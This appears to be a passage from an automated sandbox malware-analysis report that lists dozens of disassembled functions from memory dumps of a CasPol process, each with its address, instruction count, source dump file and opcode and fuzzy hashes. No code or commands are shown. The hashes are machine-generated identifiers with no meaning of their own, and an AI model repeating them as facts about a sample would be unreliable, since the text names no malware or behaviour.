                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624FA18 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 901caacb93d2e3ff8a42772dd1b630364eaa1f826e5a75ba729d67c4c83cb950
                                                                                                                                                                                                                                                    • Instruction ID: 5a53f9700a41e0072634b65e5f18212a592d89e55b606b7203e10a613ecf85fc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 901caacb93d2e3ff8a42772dd1b630364eaa1f826e5a75ba729d67c4c83cb950
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51C8B0B202159BEF68AA6CD95872E365ADBCA710F20442AE80AC77D1D97CCC854792
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624FA28 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5b5cb270a9b3533c88418c63e735db0420d0a9e59f90dc8f5efff0bec7d77772
                                                                                                                                                                                                                                                    • Instruction ID: 697cf6a070e8f92d4c36fcb7856c5af028768bbcc89a9036b7b00f23a16d0a47
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b5cb270a9b3533c88418c63e735db0420d0a9e59f90dc8f5efff0bec7d77772
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0851B970B202159BEF68AA6CD95872F355EE7CA710F60443AE80AC77D1DD7CCC854792
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06249139 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7a3774aa1a7c9aa207fe7b84384daf78ae1c5174d02a5e2fb19ab54ad20c3905
                                                                                                                                                                                                                                                    • Instruction ID: 25f3219b0fa4abdb2ce682389e2c283f6715ec5cac21224bc8a26297fa20da8b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a3774aa1a7c9aa207fe7b84384daf78ae1c5174d02a5e2fb19ab54ad20c3905
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F517270F501059FDB68EB7DD8A4B6E77E6FB88350F108469C90AE7384EE349C428B91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06244B60 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bfb2618a7d109b4dc423e14f39dd412ff7b69f29873fc82fd8f3658811c88e03
                                                                                                                                                                                                                                                    • Instruction ID: ce4f949a0cb1c4814b231ba8a6313a01dceafa48a6d523278be550112ae79d5a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfb2618a7d109b4dc423e14f39dd412ff7b69f29873fc82fd8f3658811c88e03
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65518170F102189FEB559FA9C854BAEBBF6FF88700F208429D506AB395DE749C05CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06245428 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 249dd70a5b0424a1e6916e4b865c4f155340ced687d58d6aa75cb3dc9a886b1e
                                                                                                                                                                                                                                                    • Instruction ID: d119ffe215b224e50ec86feeeb5e4c0f8fc76530646281c05104852c3e6cc762
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 249dd70a5b0424a1e6916e4b865c4f155340ced687d58d6aa75cb3dc9a886b1e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07418B31E1060A8FDF74DFA9D880ABFF7B6EB84210F10492AE55AE7600D330E855CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624DAC0 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1a39b6aeada6a214021e9ce722717c7e363c897d46da1cf8bf35b0b806722be5
                                                                                                                                                                                                                                                    • Instruction ID: 688a758fd0f3200b9be6beb96ff35b76095db5d124649a4c8f4f287e952b4a3b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a39b6aeada6a214021e9ce722717c7e363c897d46da1cf8bf35b0b806722be5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD417370E2070ADBDB69EFA5C49475EBBB6FF85704F208929D812E7240DBB09945CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624DAAD Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6adc64ecefc09d6e9667c17dfe63c6e7b4e27180a74f83f846a44e235a238110
                                                                                                                                                                                                                                                    • Instruction ID: b9abc2726ecc87ef9b7b9bbe750bd69a2e6d2ea56f82b4556653d230fa3d8d84
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6adc64ecefc09d6e9667c17dfe63c6e7b4e27180a74f83f846a44e235a238110
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8841B670E2074A9FDB69EF75C49465EBBB6FF86704F10492AE802E7240DB71D845CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624FC68 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bb79beecae2971c6bd772c7dbd156b777f01d2915981053d5e69bd6209cf6160
                                                                                                                                                                                                                                                    • Instruction ID: 482c4832b9c36edaf7ed95aaba08d68c47eb020366e3befe6c051aeff7cd6a76
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb79beecae2971c6bd772c7dbd156b777f01d2915981053d5e69bd6209cf6160
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6231DE36F11209DFCB18ABB8E6482ADBBB2FBC4312F108879E506D7240DF359856C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06242088 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 38cc5bb741a047fd230f3e6535c6ea04403cc6d034cb82ce04fb6a1546138ad0
                                                                                                                                                                                                                                                    • Instruction ID: dde72c9c98710ea36ff1c8e620f594247687d1b0e9fb77df4734d6b8a9d1ac87
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38cc5bb741a047fd230f3e6535c6ea04403cc6d034cb82ce04fb6a1546138ad0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67316030E20619CBDB19DF69D89469EBBB2FF89300F508519E80AE7340DB71AD42CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06242098 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 40d9b31b0a28366cc18f07a21f5ebfcaa2697a6f1f6c675d974a36cbc7b94cd1
                                                                                                                                                                                                                                                    • Instruction ID: 97d8bb58e80b539cd42ea88738f53b242959d2acb52a59c81a9b45dd3a59c602
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40d9b31b0a28366cc18f07a21f5ebfcaa2697a6f1f6c675d974a36cbc7b94cd1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A314330E10619DBDB19DF69D89469EBBF6EF89300F508519E816E7340EB71AD41CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06243AA9 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 4809294bbce5ef1928421a0485a137128b15cfbebba67819890b37aec2a7744b
                                                                                                                                                                                                                                                    • Instruction ID: 3047a1f16c23fe477a52dfe78e192006d83c05929a9c8290492d32ebecc96bda
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4809294bbce5ef1928421a0485a137128b15cfbebba67819890b37aec2a7744b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D21A975F546158FDB45DFBAE880AAEBBF1EB4C310F148069E905E7391EB34E8018B90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06243AB8 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 12e4c1bef53e2564065d845e07f75dee054a8150d2e908a836c67ab4f93c78b5
                                                                                                                                                                                                                                                    • Instruction ID: 3e3591a0eb6976225e494caaa97e034d3b240434b8c691e6773a9b4cffd449f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12e4c1bef53e2564065d845e07f75dee054a8150d2e908a836c67ab4f93c78b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F215775F106199FDB44DF6AE880AAEBBF1FB48340F108069E905E7381EB34EC008B90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0136D030 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2515260188.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_136d000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 57674aec5da1d349907f4d199d8e0360db5517bee7f17845fdc8316d78623ccf
                                                                                                                                                                                                                                                    • Instruction ID: a77fa71e8add9b13e6df6158c90337ea099c67a3ebb1b44a374e89610f95bb1d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57674aec5da1d349907f4d199d8e0360db5517bee7f17845fdc8316d78623ccf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A42146B1604304DFDB15DF54D9C0B26BBA9FB84318F24C56DD88A4B24AC37BD847CA62
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06246D10 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b1b5aef631a1876cff1551300d07ecee96c49eab83cbbc642ad1c0c6742cd2ca
                                                                                                                                                                                                                                                    • Instruction ID: 8241d09d3eec4f89757669c948ff16087742d69ac1fc9e957295742361e3eb04
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1b5aef631a1876cff1551300d07ecee96c49eab83cbbc642ad1c0c6742cd2ca
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C217530B21119DFDF58EA6DE4546ADB7A7EB85310F248425D805D7340DB35AC818B94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06245418 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bf8a010e506ec6e8b647c60e6bf6d32cb5ad0de1559ff498b7ee5f53f5f75b8c
                                                                                                                                                                                                                                                    • Instruction ID: 8bbbb74ebd6e2337c8b362987def3296c921ac244ec85759608c767fd44fb7ae
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf8a010e506ec6e8b647c60e6bf6d32cb5ad0de1559ff498b7ee5f53f5f75b8c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11D071A107058FCB25DFB5CCC0AAFFBB6FF88200B144929E595E7650D770A855CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06243BC8 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 511322398255f36dde39852911aaf3f6fe224f73461a031601af1affc83c52a2
                                                                                                                                                                                                                                                    • Instruction ID: 62a243416ce47b6dc8aefe74d2e2cc7888b51ee5c043503485df0c7a002a6757
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 511322398255f36dde39852911aaf3f6fe224f73461a031601af1affc83c52a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07118236B205298FCF58E67ED8146AEB7E6FBC8350B108039D805E7340DE659C0287D0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624A2FA Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 63dadd0148831ace0b87b6f351dab4167f2cab17fc07ec12d4b296843d65be3f
                                                                                                                                                                                                                                                    • Instruction ID: 6aab94cae74a45f72a59c88dc8ddead69cfb5ac6ab5c88638db79085c5687abf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63dadd0148831ace0b87b6f351dab4167f2cab17fc07ec12d4b296843d65be3f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4014C30B641620FD79AA63CD8547AE7BE6EB8A710F04886DF50ACB355EE15CC428394
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06243880 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b250f0aad35646bd3c97e79064767b43f300bf552443235d298d64fc55b671c3
                                                                                                                                                                                                                                                    • Instruction ID: 17f7a8983aecc18dc32400f4f7f380f08065fb1fab36b8ac464d5ed1e72f0bad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b250f0aad35646bd3c97e79064767b43f300bf552443235d298d64fc55b671c3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E21F2B5D01219AFDB10DF9AD884BDEFBB4FB48314F10852AE918A7310C375AA45CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0136D02B Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2515260188.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_136d000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                                                                                                                                                                                    • Instruction ID: 7b1e5ee5343ad4b62c2c75c45728189d1ebbe89a00915693ec266b95a38ef101
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E511BB75604280CFDB12CF54D9C0B15BBB1FB84318F28C6AAD8894B65BC33AD44ACB62
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06243068 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 531f11a04467658fb0a6ce946daa4409e848136b72baf01ee973d26f0f735978
                                                                                                                                                                                                                                                    • Instruction ID: ca0bd16dfe602d02bb6bc21fb4679e47dcf6778bb6e9028a6ecf8e787512ee6c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 531f11a04467658fb0a6ce946daa4409e848136b72baf01ee973d26f0f735978
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34016171E102299FDB58EB7AC8405DEF7B5EB89310F10856AD906EB240DA31D941CB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06243888 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: df872fde4b9931b955d5030f224dadefb57a41480094d4759b598cfaafc0d4c8
                                                                                                                                                                                                                                                    • Instruction ID: bd8780c882df30840d43d7ca300d949402b9a7525e83133e5ce8d3b7b5f572ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df872fde4b9931b955d5030f224dadefb57a41480094d4759b598cfaafc0d4c8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A611D0B5D01259AFCB10DF9AD884BDEFBB4FB48314F10812AE918A7310C375A944CFA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06243E10 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9254ab94591e461f21a824064cbf70d3a7690a1351f1b29be08ec449067f4457
                                                                                                                                                                                                                                                    • Instruction ID: e657c0937e01ef4be453b01bcd48a61436d944f57536e9d3507269b81a99069a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9254ab94591e461f21a824064cbf70d3a7690a1351f1b29be08ec449067f4457
